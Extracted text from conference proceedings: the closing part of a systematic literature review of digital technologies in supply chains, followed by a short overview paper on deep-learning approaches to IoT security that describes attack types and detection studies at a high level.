The Internet of Things brings elements of response by integrating several information and communication technologies. For example, tools and software for storing, extracting and analyzing information as well as electronic equipment for connecting users or sets of materials

[23]

A device of objects intended to ensure the connection between them, without having to resort to human means

[37]

A large register of transaction data recorded in a multi-member network. Its transaction data is stored in folders that are arranged in historical order

[38]

A large digital ledger that is used to share and distribute transactions within a network

[39]

A digital directory that is encrypted and hosted on multiple servers in a public or private network. Once these folders are assembled in a chain, they are unchangeable and cannot be deleted. Instead, they are controlled and administered through automated and joint management procedures

[40]

A new technology that focuses on the dematerialization of repetitive, routine and standards-based human operations, with the aim of generating gains for companies that choose to deploy such technology (continued)

A Literature Review of Digital Technologies in Supply Chains

255

Table 1. (continued) Tools

Cloud computing (CC)

Sources

Description

[41]

A pre-configured programming interface that uses operating principles and a set of predetermined tasks to automatically execute a sequence of procedures, operations, exchanges, and assignments in one or more non-associated software systems to produce a result or service with human exception handling

[42]

The dematerialization of the execution of operations while using structured information flow management mechanisms, leading to a precise decision and a deterministic result

[43, 44]

Cloud computing is a system offering accessibility to a generalized network, containing a set of configurable computer data (networks, servers, storage, applications and services) that can be delivered and unlocked in a rapid manner with minimal management effort or interaction with service providers

[45]

Cloud computing is a digital technology for storing and processing huge amounts of data, which boosts the productive system of companies and brings them higher performance and lower costs

[46]

Cloud computing is turning information technologies into utility computing accessible to all organizations for managing and delivering services over the internet

However, all its digital technologies play important roles in supply chain management, as an example, researchers [47] have analyzed the impact of the use of Big Data analytics (BDA) in improving supply chain performance under different facets: visibility, robustness, resilience. Cloud Computing (CC) further contributes to developing the responsiveness and yield of supply chain processes [48], while Internet of Things (IoT) facilitates supply chain coordination, programming and monitoring processes [49]. In addition to the plurality of digital tools used in supply chain management, this wave of digitalization also results in supply chains acquiring new properties and characteristics [50–52]. Table 2 sign the main characteristics of the numerically technologies in supply chain from the scientific literature.

256

R. El Gadrouri Table 2. Characteristics of the digital technologies in supply chain

Characteristics

Sources Description

Intelligence

[50, 51] Characterized by intelligence that enables better autonomous decision making, automated execution, self-learning, and promotes innovation in supply chain operations due to the options offered by the use of technology means

Scalability

[50, 51] Beyond the problem of responding to changes in the size of supply chain, while making it possible to optimize processes and identify anomalies and errors

Speed

[51, 53] Makes it possible to achieve the speed desired by organizations that are always looking for ways to achieve rapid delivery

Transparency

[52]

Flexibility

[51, 52] The ability to ensure operational agility in the face of market volatility and changing circumstances. Otherwise, this digitalization allows supply chain to respond effectively and efficiently to its circumstances through the active use of collected and specified data

The scheduling of flows within the supply chain. It is, among other things, the modeling of the supply chain networks by the fact of mobilizing in real time to the changes

Connectivity global [51, 52] Establishing a way, via digital technologies, to build efficient global centers to provide goods and services locally, rather than transporting them to around the world Innovation

[54]

A key feature to ensure that digital technologies remain scalable to change. The world is awash in a generation of technologies at an unprecedented rate. Digital technologies are expected to find better ways to integrate these advances into processes to maintain competitiveness and supply chain excellence

3 Methodological Procedures We chose for the conduct of this study, the protocols of [55], which included the following steps: (1) Planning the review, (2) Conducting the review, and (3) reporting the results of the review, of 96 articles identified in relevant journals in the use of technology means in supply chains fields.

A Literature Review of Digital Technologies in Supply Chains

257

Table 3 and Fig. 1 provides a clear picture of our study approach, targeted databases, type of publication, use of keywords in the search structure. Table 3. Research protocol parts Research protocol

Details description

Research databases

Web of Science (However, WoS covers a wide-ranging number of disciplines, and its records go back to 1900) [56]. Therefore, we chose WoS as our source to extract articles information [55]

Publication type

Peer-review journal publications

Language

English language

Date range

We did not apply restrictions on time, in order to include all possible studies into our list; the latest search was done in mid-2021

Search fields

Titles, abstracts & keywords

Search terms

Include any combinations of strings of “Digit*” OR “Digital Technologies” OR “Technology Transfer “ OR “Digital Technology Adoption” AND (“Supply Chain “ or “ Supply Chain Management” We used all these key-words to retrieve all possible results

Criteria for inclusion

Direct connection to the article research objectives (Build on digital technologies focus on one or more specific digital technologies enabling the digitalization of the supply chain) and focus also in ‘Operations Research and Management Science’, ‘Business’, ‘Management’ and ‘Economics’

Criteria for exclusion

No direct relationship with the research objectives of the article (Not to focus on articles dealing with technical aspects)

Data analysis and synthesis All types of analysis

258

R. El Gadrouri

Systematic Review Literature

Databases: Web of Science N = 2999

Execution criteria N = 517

Abstract Screening and Short-listing of articles N = 220

Full paper Analysis N = 96 Fig. 1. The literature Review Protocol

4 Results and Discussions All the selected articles were published from the year 2014 onwards, the majority of them in the years 2019 and 2020, which is strong evidence that the scientific approach in relation to the employment of digital technologies in supply chain management is in search. Illustrated in Fig. 2, the distribution of selected papers according to their year of publication. Before the year 2018, there were less than seven articles published per year on this subject, but in the year 2019, the level of publication has skyrocketed and a large volume of articles has been produced during the 2019 and 2020, including twenty-four articles in 2019, thirty-nine articles in 2020 and twelve articles 2021 (knowing that our search was limited in June 2021).

A Literature Review of Digital Technologies in Supply Chains

259

45 39

40 35 30 24

25 20 15

12

10 5 5

6

7

2017

2018

2

1

0 2014

2015

2016

2019

2020

2021

Fig. 2. Distribution of papers by publication year

However, the 96 articles selected in this study are distributed in 41 journals, as exposed in Table 4. The journal “roduction Planning & Control” dominated this distribution, with 15 articles published on this topic, followed by several other journals “Supply Chain Management-An International Journal” (6 articles), International Journal Of Production Research (6 articles), International Journal Of Production Economics (6 articles), International Journal Of Physical Distribution & Logistics Management (5 articles) and International Journal Of Logistics Management (4 papers). The main authors are, Wamba, Ivanov, Dolgui, Queiroz and Seyedghorban. Table 4. Distribution of papers by journals. Journals

No. of Articles

Production Planning & Control

15

Supply Chain Management-An International Journal

6

International Journal Of Production Research

6

International Journal Of Production Economics

6

International Journal Of Physical Distribution & Logistics Management

5

International Journal Of Logistics Management

4

Transportation Research Part E-Logistics And Transportation Review

3

Industrial Marketing Management

3 (continued)

260

R. El Gadrouri Table 4. (continued)

Journals

No. of Articles

International Journal Of Operations & Production Management

3

Business Process Management Journal

3

Production And Operations Management

2

Logistics-Basel

2

International Journal Of Business Analytics

2

Supply Chain Forum

2

Operations And Supply Chain Management-An International Journal

2

International Journal Of Logistics-Research And Applications

2

Business Horizons

2

Journal Of Modelling In Management

2

Logforum

2

Benchmarking-An International Journal

2

Journal Of Manufacturing Technology Management

2

Journal Of Business Logistics

2

Technological And Economic Development Of Economy

1

Journal Of Business Ethics

1

International Journal Of Lean Six Sigma

1

Journal Of Industrial Integration And Management-Innovation And Entrepreneurship

1

Journal Of Business Research

1

Brazilian Journal Of Operations & Production Management

1

Journal Of Engineering And Technology Management

1

International Journal Of Mathematical Engineering And Management Sciences

1

Estudios De Economia Aplicada

1

Journal Of Purchasing And Supply Management

1

Applied Stochastic Models In Business And Industry

1

Industry And Innovation

1

Systems Research And Behavioral Science

1

Engineering Construction And Architectural Management

1

Technovation

1

Management Science

1 (continued)

A Literature Review of Digital Technologies in Supply Chains

261

Table 4. (continued) Journals

No. of Articles

Journal Of Enterprise Information Management

1

Oeconomia Copernicana

1

Total

96

Figure 3 analyses the set of research methods used in the selected articles were analyzed. It results that the case study monopolizes the most used methods (40 papers), followed by conceptual analysis (28 papers), literature review (13 papers), as well as and other methods, such as mixed (5 papers) and Delphi (1 paper). We also studied the distribution of articles by country presented in Table 5. The study highlights that the number of publications comes from only 11 countries. It should be noted in this sense that more than 62.5% of the articles come from England, followed by the USA (13.5%). The results in Table 2 clearly show that the first two countries (England and USA) contribute more than 76% of the total contributions. This inequality calls into question the interest in this subject or the scarcity of data in this field in other countries.

45

40

40 35 30

28

25 20 13

15 10

9 5

5

1

0

Fig. 3. Publications by research methodology

262

R. El Gadrouri Table. 5. Countries and Number of Publications. Country

No. of articles

Percent

England

60

62,5

USA

13

13.5

Netherlands

11

11,45

Poland

3

3.25

Switzerland

2

2,08

Indonesia

2

2,08

Spain

1

1,04

Singapore

1

1,04

Brazil

1

1,04

India

1

1,04

Lithuania

1

1,04

96

100

Total

5 Conclusion This study, which analyzed 96 articles according to the literature review method, makes an important contribution to the scientific community of supply chain management, highlighting the different digital technologies adopted in the supply chain literature, as well as their characteristics and benefits. Our results expose the presence of a restricted sharing of articles (96 papers in 41 journals), indicating that the implementation of supply chain digitalization in academic research, is so far limited to a few variety of journals (England, USA), which is suggestive to the researchers of its countries to coordinate with researchers of countries with low publications, especially Africa, Asia and Latin America, in order to exchange and grow the degree of emergence of scientific research in this area on a global scale. Moreover, what also explains why this field is in its early stages is the nature of the research, which remains limited to case studies (40 of 96 articles) and conceptual analyses (28 of 96 articles). This may also require researchers to conduct empirical validation and confirmation studies. In other words, this study can be blamed for limitations related mainly to the exclusion criteria chosen by us, having eliminated all articles written in languages other than English, in addition to the fact that this paper also eliminated book chapters, books and conference proceedings. Considered then as a loss for the exploitation of other data that may be very relevant for this analysis. Overall, the supply chain has recently entered a new phase of digitization, in which it differs from previous phases in terms of scope, responsiveness, transformative capacity and complexity. This article has examined the specifics, which are likely to occur in any implementation of supply chain technologies, keeping in mind without any uncertainty that the ability to use its digital technologies has the power to continue and better refine the criteria of supply chain management. In contrast, the adoption of digital technologies in supply chain can surely face obstacles to overcome, through the accurate capture of

A Literature Review of Digital Technologies in Supply Chains

263

new technologies and their disruptions. In this sense, we can see that the scientific research that analyzes the levers and obstacles to the use of digital technologies is still scarce, both theoretically and empirically. For this reason, we consider it compelling to carry out extensive work in this area in order to explain and test the contribution of this phenomenon.

References 1. Ibarra, D., Ganzarain, J., Igartua, J.I.: Business model innovation through Industry 4.0: a review. Procedia Manuf. 22, 4–10 (2018) 2. Alicke, K., Rachor, J., Seyfert, A.: Supply chain 4.0–the next-generation digital supply chain. McKinsey (2016). https://www.mckinsey.com/business-functions/operations/our-ins ights/supply-chain-40-the-nextgeneration-digital-supply-chain. Accessed 6 Sept 2018 3. Garay-Rondero, C.L., Martinez-Flores, J.L., Smith, N.R., Morales, S.O.C., AldretteMalacara, A.: Digital supply chain model in Industry 4.0. J. Manuf. Technol. Manag. (2019) 4. Ehie, I., Ferreira, L.M.D.: Conceptual development of supply chain digitalization framework. In: IFAC-PapersOnLine, vol. 52, no 13, pp. 2338–2342 (2019) 5. Ernst and Young: Digital Supply Chain: It is All About That Data (2016) 6. Ivanov, D.: Viable supply chain model: integrating agility, resilience and sustainability perspectives—lessons from and thinking beyond the COVID-19 pandemic. Ann. Oper. Res. 319, 1–21 (2020). https://doi.org/10.1007/s10479-020-03640-6 7. Queiroz, M.M., Telles, R.: Big data analytics in supply chain and logistics: an empirical approach. Int. J. Logist. Manag. 29, 767–783 (2018) 8. Queiroz, M.M., Fosso Wamba, S., De Bourmont, M., Telles, R.: Blockchain adoption in operations and supply chain management: empirical evidence from an emerging economy. null, 1–17 (2020). https://doi.org/10.1080/00207543.2020.1803511 9. Ghadge, A., Kara, M.E., Moradlou, H., Goswami, M.: The impact of Industry 4.0 implementation on supply chains. J. Manuf. Technol. Manag. 31, 669–686 (2020) 10. Kouhizadeh, M., Saberi, S., Sarkis, J.: Blockchain technology and the sustainable supply chain: theoretically exploring adoption barriers. Int. J. Prod. Econ. 231, 107831 (2021). https:// doi.org/10.1016/j.ijpe.2020.107831 11. Koh, L., Orzes, G., Jia, F.J.: The fourth industrial revolution (Industry 4.0): technologies disruption on operations and supply chain management. Int. J. Oper. Prod. Manag. 39, 819–828 (2019) 12. Wang, Y., Chen, C.H., Zghari-Sales, A.: Designing a blockchain enabled supply chain. Int. J. Prod. Res. 1–26 (2020) 13. Ivanov, D., Predicting the impacts of epidemic outbreaks on global supply chains: a simulation-based analysis on the coronavirus outbreak (COVID-19/SARS-CoV-2) case. Transport. Res. Part E Logist. Transport. Rev. 136, 101922 (2020). https://doi.org/10.1016/j. tre.2020.101922 14. Korpela, K., Hallikas, J., Dahlberg, T.: Digital supply chain transformation toward blockchain integration, January 2017. https://doi.org/10.24251/HICSS.2017.506 15. Manyika, J., et al.: Harnessing Automation for a Future that Works. McKinsey Global Institute (2017) 16. Büyüközkan Feyzio˘glu, G., Gocer, F.: Digital Supply Chain: Literature review and a proposed framework for future research (2018) 17. Chick, G., Handfield, R.: The Procurement Value Proposition: The Rise of Supply Management. Kogan Page Publishers, London (2014)

264

R. El Gadrouri

18. Demetriou, G.A.: Mobile robotics in education and research. Mob. Robots-Curr. Trends, 27–48 (2011) 19. Dubey, R., et al.: Big data analytics and artificial intelligence pathway to operational performance under the effects of entrepreneurial orientation and environmental dynamism: a study of manufacturing organisations. Int. J. Prod. Econ. 226, 107599 (2020) 20. Frederico, G.F., Garza-Reyes, J.A., Anosike, A., Kumar, V.: Supply Chain 4.0: concepts, maturity and research agenda. Supply Chain Manag. Int. J. (2019) 21. Ivanov, D., Tsipoulanidis, A., Schönberger, J.: Digital supply chain, smart operations and Industry 4.0. In: Ivanov, D., Tsipoulanidis, A., Schönberger, J. (eds.) Global Supply Chain and Operations Management. Springer Texts in Business and Economics, pp. 481–526. Springer, Cham (2019) (2019). https://doi.org/10.1007/978-3-319-94313-8_16 22. Lohmer, J., Bugert, N., Lasch, R.: Analysis of resilience strategies and ripple effect in blockchain-coordinated supply chains: an agent-based simulation study. Int. J. Prod. Econ. 228, 107882 (2020) 23. Queiroz, M.M., Telles, R., Bonilla, S.H.: Blockchain and supply chain management integration: a systematic review of the literature. Supply Chain Manag. Int. J. (2019) 24. Wu, Y.U.N., Cegielski, C.G., Hazen, B.T., Hall, D.J.: Cloud computing in support of supply chain information system infrastructure: understanding when to go to the cloud. J. Supply Chain Manag. 49(3), 25–41 (2013) 25. Wang, S., Wan, J., Li, D., Zhang, C.: Implementing smart factory of Industrie 4.0: an outlook. Int. J. Distrib. Sens. Netw. 12(1), 3159805 (2016) 26. Hofmann, E., Rüsch, M.: Industry 4.0 and the current status as well as future prospects on logistics. Comput. Ind. 89, 23–34 (2017) 27. Wamba, S.F., Akter, S., Edwards, A., Chopin, G., Gnanzou, D.: How ‘big data’ can make big impact: findings from a systematic review and a longitudinal case study. Int. J. Prod. Econ. 165, 234–246 (2015) 28. Bahrin, M.A.K., Othman, M.F., Azli, N.N., Talib, M.F.: Industry 4.0: a review on industrial automation and robotic. Jurnal Teknologi 78(6–13), 137–143 (2016) 29. Hu, H., Wen, Y., Chua, T.-S., Li, X.: Toward scalable systems for big data analytics: a technology tutorial. IEEE Access 2, 652–687 (2014) 30. Haenlein, M., Kaplan, A.: A brief history of artificial intelligence: on the past, present, and future of artificial intelligence. Calif. Manag. Rev. 61(4), 5–14 (2019) 31. Chung, C.H.: The Kaizen Wheel–an integrated philosophical foundation for total continuous improvement. TQM J. (2018) 32. Pei, J., Liu, X., Fan, W., Pardalos, P.M., Lu, S.: A hybrid BA-VNS algorithm for coordinated serial-batching scheduling with deteriorating jobs, financial budget, and resource constraint in multiple manufacturers. Omega 82, 55–69 (2019) 33. Mishra, D., Gunasekaran, A., Papadopoulos, T., Childe, S.J.: Big Data and supply chain management: a review and bibliometric analysis. Ann. Oper. Res. 270(1–2), 313–336 (2016). https://doi.org/10.1007/s10479-016-2236-y 34. Mishra, D., Sharma, R.R.K., Gunasekaran, A., Papadopoulos, T., Dubey, R.: Role of decoupling point in examining manufacturing flexibility: an empirical study for different business strategies. Tot. Qual. Manag. Bus. Excellence 30(9–10), 1126–1150 (2019) 35. Okano, M.T., IOT and industry 4.0: the industrial new revolution. In: International Conference on Management and Information System, pp. 75–82 (2017) 36. Majeed, A.A., Rupasinghe, T.D.: Internet of things (IoT) embedded future supply chains for industry 4.0: an assessment from an ERP-based fashion apparel and footwear industry. Int. J. Supply Chain Manag. 6(1), 25–40 (2017) 37. Swan, M.: Blockchain: Blueprint for a New Economy. O’Reilly Media, Inc., Sebastopol (2015)

A Literature Review of Digital Technologies in Supply Chains

265

38. Al-Saqaf, W., Seidler, N.: Blockchain technology for social impact: opportunities and challenges ahead. J. Cyber Policy 2(3), 338–354 (2017) 39. Wang, Y.: Designing a blockchain enabled supply chain. In: IFAC-PapersOnLine, vol. 52, no. 13, pp. 6–11 (2019). https://doi.org/10.1016/j.ifacol.2019.11.082 40. Ivanˇci´c, L., Vugec, D.S., Vukši´c, V.B.: Robotic process automation: systematic literature review. In: International Conference on Business Process Management, pp. 280–295 (2019) 41. Huang, F., Vasarhelyi, M.A.: Applying robotic process automation (RPA) in auditing: a framework. Int. J. Account. Inf. Syst. 35, 100433 (2019) 42. Lacity, M., Willcocks, L., Craig, A.: Service automation: cognitive virtual agents at SEB Bank. In: The Outsourcing Unit Working Research Paper Series (2017) 43. Badger, M.L., Grance, T., Patt-Corner, R., Voas, J.M.: Cloud Computing Synopsis and Recommendations. National Institute of Standards & Technology, Gaithersburg (2012) 44. Mell, P., Grance, T.: The NIST definition of cloud computing (2011) 45. Mitra, A., Kundu, A., Chattopadhyay, M., Chattopadhyay, S.: A cost-efficient one time password-based authentication in cloud environment using equal length cellular automata. J. Industr. Inf. Integr. 5, 17–25 (2017) 46. Aviles, M.E.: The impact of cloud computing in supply chain collaborative relationships, collaborative advantage and relational outcomes (2015) 47. Gunasekaran, A., Subramanian, N., Papadopoulos, T.: Information technology for competitive advantage within logistics and supply chains: a review. Transport. Res. Part E Logist. Transport. Rev. 99, 14–33 (2017) 48. Jede, A., Teuteberg, F.: Integrating cloud computing in supply chain processes: a comprehensive literature review. J. Enterp. Inf. Manag. 28(6), 872–904 (2015). https://doi.org/10.1108/ JEIM-08-2014-0085 49. Ben-Daya, M., Hassini, E., Bahroun, Z.: Internet of things and supply chain management: a literature review. Int. J. Prod. Res. 57(15–16), 4719–4742 (2019). https://doi.org/10.1080/ 00207543.2017.1402140 50. Bechtold, J., Lauenstein, C., Kern, A., Bernhofer, L.: Industry 4.0 - the Capgemini consulting view. Capgemini Consult. 31, 32–33 (2014) 51. Hanifan, G., Sharma, A., Newberry, C.: The digital supply network: a new paradigm for supply chain management. Accenture Glob. Manag. Consult. 1–8 (2014) 52. Schrauf, S., Berttram, P.: Industry 4.0: how digitization makes the supply chain more efficient, agile, and customer-focused. Strategy& (2016). Recuperado de https://www.strategyand.pwc. com/media/file/Industry4.0.pdf 53. Raj, S., Sharma, A.: Supply chain management in the cloud. Accenture Glob. Manag. Consult. 1–12 (2014) 54. Cukier, K., Mayer-Schonberger, V.: Big Data: La révolution des données est en marche. Robert Laffont (2014) 55. Tranfield, D., Denyer, D., Smart, P.: Towards a methodology for developing evidenceinformed management knowledge by means of systematic review. Br. J. Manag. 14(3), 207–222 (2003) 56. Meho, L.I., Yang, K.: Impact of data sources on citation counts and rankings of LIS faculty: Web of Science versus Scopus and Google Scholar. J. Am. Soc. Inf. Sci. Technol. 58(13), 2105–2125 (2007)

IoT Systems Security Based on Deep Learning: An Overview El Mahdi Boumait(B) , Ahmed Habbani, and Reda Mastrouri Smart Systems Laboratory, ENSIAS, Mohammed V University in Rabat, Rabat, Morocco {elmahdi_boumait2,ahmed.habbani,reda_mastouri}@um5.ac.ma

Abstract. The Internet of Things (IoT) has quickly turned into one of the most advanced commercial and technological domains. IoT technologies are crucial for developing a range of smart applications in the real world to improve the quality of life. However, robust security systems, privacy, authentication and attack recovery mechanisms are needed. This study is aimed at deep analysis of the security difficulties and threat sources in IoT applications as well as state-of-the-art Deep Learning approaches to achieve a high level of confidence and security in IoT systems. Keywords: IoT · Security · Artificial Intelligence · Deep Learning

1 Introduction In many parts of our everyday life, the Internet of Things plays a major role. It is included in the development of numerous sectors, such as healthcare, cars, entertainment, industrial goods, sports, houses, etc. The general nature of IoT facilitates daily tasks, enhances how people connect, and increases our social relationships with people and items. However, this comprehensive view also poses certain questions, such as the level of IoT safety, and how it provides and safeguards user privacy. The remaining sections of this paper are organized as follows: • • • •

Section 2 general notions of IoT Security threats per layer. Section 3 history of IoT threats. Section 4 expands on Deep Learning and IoT Security. Section 5 expands on open issues and research directions.

2 IoT Security Threats Per Layer The IoT layer architecture is complex and complicated, as we all know. To keep the system stable, we need to comprehend all types of security issues at various layers, as well as prospective threats. When considering the system as a whole, security problems should be resolved from the start. Each layer (see Fig. 1) includes a plethora of threats and attack types. Eavesdropping, for example, is a common occurrence in the sensing layer. © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 266–271, 2023. https://doi.org/10.1007/978-3-031-35251-5_25

IoT Systems Security Based on Deep Learning: An Overview

267

Certain IoT applications are vulnerable to eavesdroppers. During several processes, such as data transmission or authentication, attackers may eavesdrop and seize data [1]. The DDoS attack was the best-known attack on the network layer, with a huge number of unwanted requests flooding the attackers with this sort of attack. This deactivates the target server and disrupts authenticated user services [2]. On the other hand, the Man-In-The-Middle attack poses a threat to the data processing layer. The MQTT protocol uses the publishing subscription paradigm for communication channels, which serves as an agent for the MQTT broker. This helps to unite publishing and subscription customers, enabling communications to be transmitted without the awareness of the receiver [1]. Finally, the application layer is vulnerable to a variety of assaults; we’ll look at the reprogram attacks as an example. If the programming system isn’t secured, attackers may be able to remotely reprogram IoT devices. This could result in an IoT network being hacked [3].

Fig. 1. IoT security attacks per layer

3 History of IoT Security Attacks In the development of IoT, security generally occupies a second place so the defense likely measures a very weak which therefore threatens the entire IoT system. In the following, we present some examples from the history of attacks on IoT systems. • Mirai Botnet Attack The Mirai botnet attack, which started in late 2016, became the world’s greatest DDoS attack. It directly targeted Dyn, the service provider, by using botnet malware on IoT devices. Major websites, including Reddit, Netflix, CNN, and Twitter, which is situated in San Francisco, were taken offline as a result of the attack. Once a computer has been infected with the Mirai malware, it will continue to look for other IoT devices

268









E. M. Boumait et al.

that are vulnerable on the Internet. They track them down and use well-known default usernames and passwords to get access to the device, where they spread the Mirai malware. A major chunk of this equipment was made up of digital cameras and DVR players [4]. Man-In-The-Middle attack In 2015, a gang in Europe utilized cyber assaults from Man-in-the-Middle (MiTM) to snatch and intercept SOPHOS payment requests [5]. According to the reports, the gang received around EUR 6 million. They supposedly acquired illegal access by monitoring and sniffing payment requests into company email accounts [5]. The JEEP Hack In July 2015, a team of researchers exploited a weakness in software updates to capture the car through the Sprint mobile network [5]. They realized that they could regulate the vehicle’s speed and even swerve it off the road [5]. SAGE Hack Sage, a UK-based accounting and HR software provider, was the subject of an insider unauthorized access attack in 2016 [5]. Unauthorized access was exploited by a company employee to acquire sensitive client information, including salary and bank account information. Cambridge AnalyticaAttack Cambridge Analytica got private information on over 50 million Facebook users in March 2018. Cambridge Analytica stated that it had amassed over 5,000 data points on every single American voter [5]. The company claimed to be able to establish a person’s personality type and then send them micro-targeted communications to affect their behavior by doing behavioral or “psychographic” analysis of the datasets in its possession.

4 Deep Learning and IoT Security Deep Learning (DL) can be considered a more advanced field of Machine Learning (see Fig. 2). Deep Learning is a set of algorithms that imitate the neural networks of the human brain. The computer is self-learning. The depth of the model would be determined by the number of layers in the model. DL can extract complex data information automatically. The most notable advantage of deep learning is its higher performance in huge datasets. A. Fatani [6] Deep Learning techniques are suitable for IoT devices as they generate large volumes of data. In addition, the IoT ecosystem may be closely connected with the Deep Learning methods. Deep linking is a standardized protocol that makes it possible to automatically communicate with IoT-based devices and apps without human intervention. For example, IoT devices in a clever house can interact automatically to form a smart house. All of these possibilities have made the application of Deep Learning to IoT systems in general, and to the security ax in particular, a vital research topic. As shown in Fig. 2, the number of studies and papers on this area is growing at an exponential rate. Authentication and access control Shi et al. [7] suggested a user authentication mechanism for the Internet of Things based on human physiological processes transmitted via Wi-Fi signals. The suggested authentication system uses the activity recognition and human identity. Channel state information is utilized in Wi-Fi signals generated by IoT

IoT Systems Security Based on Deep Learning: An Overview

269

Fig. 2. Documents talk about Deep Learning’s uses in IoT security on Scopus databases.

devices to determine the characteristics of various behavioral aspects. To understand the human physiological and behavioral features that are employed in authentication, the authors deployed a three-layer Deep Neural Network. The researchers measured their technique to accurately identify and detect spoofer. The results show an average user authentication accuracy of 91.2% and spoofer accuracy of 89.7%. Das et al. [8] presented a Long short-term memory LSTM-based authentication solution. The LSTM is used to learn about the hardware flaws that affect signal strength by using different carrier frequencies for the device. The created deep learning model learns these flaws and uses them to identify users. It’s also necessary to examine such a solution in the presence of competitors. On a testbed comprising low-power devices and radios as well as a single genuine node of 29 adversaries, the authors examined their technique. The researchers determined that a two-layer LSTM is the optimum network solution to achieve a rating accuracy of 99.58%. Attack detection and mitigation Diro et al. [9] proposed a Deep Learning-based threat detection algorithm for IoT systems. The threat detection system is mostly implemented near the smart infrastructure’s edge. The distributed attack detection mechanisms take into account a number of learning mechanism factors while determining how the learning architecture performs on the provided data. Because of resource limits and the nature of IoT applications, the fog infrastructure is justified. In the case of critical infrastructure, the learning mechanism should be located as close as feasible to the data-generating nodes in order to make quick and informed judgments in the event of an assault. The results of the research indicate that the overall accuracy of detection has increased from around 96% to over 99%. Abeshu et al. [10] proposed a distributed Deep Learning-based attack detection algorithm for the Internet of Things. The authors implemented a Deep Learning Approach to fog computing architecture for threat detection. The proposed technique focuses on the communication between fog and everything, with the learning module in the fog layer, the optimum place for a sensing process as it reduces communication latency while maximizing resource utilization. The recommended auto-encoder with 3 layers has a precision rate of 99.2%.

270

E. M. Boumait et al.

Distributed DOS attack Alharbi et al. [11] propose a Fog Computing-based Security System to address the security challenges of the IoT. The research used a Deep Neural Network approach to analyze network traffic to detect suspicious traffic sources and consequently detect DDoS behavior. The proposed Fog Computing-based Security System leverages the VPN to secure the access channel to the IoT devices. In addition, The Fog Computing-based Security System adopts challenge-response authentication to protect the VPN server against distributed denial of service DDoS attacks. Yuan et al. [12] suggested a DDoS assault detection method based on deep learning called Deep Defense. The method relies on a Recurrent Deep Neural Network to discover patterns from the network traffic sequences and network attacks, and gain powerful representation and inference from high-level characteristics from low-level ones. The experimental results show that the error rate is reduced from 7.517% to 2.103% when compared to the standard machine learning method in the larger data set. Malware analysis in IoT systems Pajouh et al. [13] suggested a recurrent neural network algorithm for malware analysis in IoT systems. The authors examined IoT applications based on Advanced RISC Machines (ARM). The authors trained their algorithms on existing malware datasets before testing their approach to the new threat. The authors determined from their experiments that LSTM classifiers outperform other classifiers. The RNN approach, in particular, detected new malware inside IoT applications with 98% accuracy. Used Deep Q networks with a Q-learning technique in IoT healthcare applications to address security concerns for authentication, access control and malware analysis. The authors used the Q-learning methodology to examine patient data via layered Deep Q-networks for authentication, and malware analysis. Deep Q networks, according to the authors, use less energy than MLP and Learning Vector Quantization. The suggested Learning-based Deep Q Network has the lowest mean error ratio (0.12) and the greatest accuracy (98.79%) among Learning Vector Quantization, MLP, and Back Propagation Neural Network.

5 Conclusion In this paper, we have examined the various IoT layers, the security of IoT systems, and the history of attacks. We examined the roles and applications of DL in the IoT from the standpoints of security and privacy. This state of the art seeks to provide a user manual that can motivate researchers to progress IoT system security. The rest of the research will be dedicated to the realization of a comparative study between technics in deep learning to test the effectiveness to achieve the planned objectives in terms of forecasting and detection.

References 1. Hassija, V., Chamola, V., Saxena, V., Jain, D., Goyal, P., Sikdar, B.: A survey on IoT security: application areas, security threats, and solution architectures. IEEE Access 7 (2019). https:// doi.org/10.1109/ACCESS.2019.2924045

IoT Systems Security Based on Deep Learning: An Overview

271

2. Kolias, C., Kambourakis, G., Stavrou, A., Voas, J.: ‘DDoS in the IoT: Mirai and other Botnets.’ Computer 50(7), 80–84 (2017). https://doi.org/10.1109/MC.2017.201 3. McDermott, B.: 5 of the Worst IoT Hacking Threats in History (So Far). Dogtown Media, March 2020 4. Sengupta, J., Ruj, S., Bit, S.D.: A comprehensive survey on attacks, security issues and blockchain solutions for IoT and IIoT. J. Netw. Comput. Appl. 149 (2020). https://doi.org/ 10.1016/j.jnca.2019.102481 5. Westby, J.: The Great Hack: Cambridge Analytica n’est que la partie visible de l’iceberg. Amnesty International, July 2019 6. Fatani, A., Abd Elaziz, M., Dahou, A., Al-Qaness, M.A.A., Lu, S.: IoT intrusion detection system using deep learning and enhanced transient search optimization. IEEE Access 9, 123448–123464 (2021). https://doi.org/10.1109/ACCESS.2021.3109081.(32) 7. Shi, C., Liu, J., Liu, H., Chen, Y.: Smart user authentication through actuation of daily activities leveraging WIFI-enabled IoT. In: Proceedings of the 18th ACM International Symposium on Mobile Ad Hoc Networking and Computing, Mobihoc 2017, New York, NY, USA, pp. 5:1– 5:10. ACM (2017). https://doi.org/10.1145/3084041.3084061(23) 8. Das, R., Gadre, A., Zhang, S., Kumar, S., Moura, J.M.F.: A deep learning approach to IoT authentication. In: 2018 IEEE International Conference on Communications (ICC), pp. 1–6, May 2018. https://doi.org/10.1109/ICC.2018.8422832(24) 9. Diro, A.A., Chilamkurti, N.: Distributed attack detection scheme using deep learning approach for internet of things. Future Gener. Comput. Syst. 82, 761–768 (2018). https://doi.org/10. 1016/j.future.2017.08.043(25) 10. Abeshu, A., Chilamkurti, N.: Deep learning: the frontier for distributed attack detection in fog-to-things computing. IEEE Commun. Mag. 56, 169–175 (2018). https://doi.org/10.1109/ MCOM.2018.1700332(26) 11. Alharbi, S., Rodriguez, P., Maharaja, R., Iyer, P., Subaschandrabose, N., Ye, Z.: Secure the internet of things with challenge response authentication in fog computing. In: 2017 IEEE 36th International Performance Computing and Communications Conference (IPCCC) (2017). https://doi.org/10.3390/electronics10101171(27) 12. Yuan, X., Li, C., Li, X.: DeepDefense: identifying DDoS attack via deep learning. In: 2017 IEEE International Conference on Smart Computing (SMARTCOMP), pp. 1–8 (2017). https:// doi.org/10.1109/SMARTCOMP.2017.7946998(28) 13. HaddadPajouh, H., Dehghantanha, A., Khayami, R., Choo, K.-K.R.: A deep recurrent neural network-based approach for internet of things malware threat hunting. Futur. Gener. Comput. Syst. 85, 88–96 (2018). https://doi.org/10.1016/j.future.2018.03.007(29)

